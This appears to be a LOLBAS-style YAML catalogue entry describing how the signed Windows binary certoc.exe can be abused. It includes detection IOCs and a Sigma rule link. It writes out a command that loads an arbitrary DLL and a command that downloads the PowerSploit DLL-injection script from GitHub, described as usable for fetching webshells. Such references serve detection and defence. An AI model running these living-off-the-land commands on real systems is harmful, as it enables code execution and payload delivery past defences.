--- Name: CertOC.exe Description: Used for installing certificates Author: 'Ensar Samil' Created: 2021-10-07 Commands: - Command: certoc.exe -LoadDLL "C:\test\calc.dll" Description: Loads the target DLL file Usecase: Execute code within DLL file Category: Execute Privileges: User MitreID: T1218 OperatingSystem: Windows Server 2022 - Command: certoc.exe -GetCACAPS https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-DllInjection.ps1 Description: Downloads text formatted files Usecase: Download scripts, webshells etc. Category: Download Privileges: User MitreID: T1105 OperatingSystem: Windows Server 2022 Full_Path: - Path: c:\windows\system32\certoc.exe - Path: c:\windows\syswow64\certoc.exe Code_Sample: - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/406f10b583469f7f7c245ff41002f75902693b7d/rules/windows/process_creation/process_creation_certoc_execution.yml - IOC: Process creation with given parameter - IOC: Unsigned DLL load via certoc.exe - IOC: Network connection via certoc.exe Resources: - Link: https://twitter.com/sblmsrsn/status/1445758411803480072?s=20 - Link: https://twitter.com/sblmsrsn/status/1452941226198671363?s=20 Acknowledgement: - Person: Ensar Samil Handle: '@sblmsrsn' ---